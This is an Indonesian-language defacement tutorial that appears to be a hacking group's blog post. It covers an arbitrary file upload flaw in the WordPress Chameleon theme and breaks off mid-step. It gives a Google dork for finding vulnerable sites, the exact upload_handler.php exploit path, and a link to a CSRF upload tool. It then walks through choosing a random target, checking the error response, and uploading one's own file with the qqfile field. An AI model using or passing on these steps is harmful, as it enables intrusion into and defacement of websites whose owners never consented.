Dedace metode Wp Chameleon Theme Arbitrary File Upload Assalamu alaikum Ya kembali lagi sama vct, sekarang vct mau kasih tutorial deface metode Wp Chameleon Theme Arbitrary File Upload^_^ Panjang juga ya nama poc na:'v Ya langsung aja^_^ Bahan - bahan : > Dork : - inurl:/wp-content/themes/cameleon/ > Exploit : - /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php > CSRF? https://tools.venom-cyber-team.my.id/tools/csrf.php Langkah - langkah : Pertama kalian dorking google dulu pakek dork di atas. Nahh kalo udah pilih salah satu web nya. Nahh sekarang tinggal nentuin vuln apa kaga nya.Caranya? Masukin exploit di atas. Ex : www.target.coli/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php Kalo vuln akan ada tulisan {"error Nyenyenye} Kalo udh langsung ke csrf aja ya mamank Kolom URL isi link web vuln tadi,POST File isi dengan qqfile kemudian klik Kunci. Klik Pilih File kemudian pilih file lu abis itu k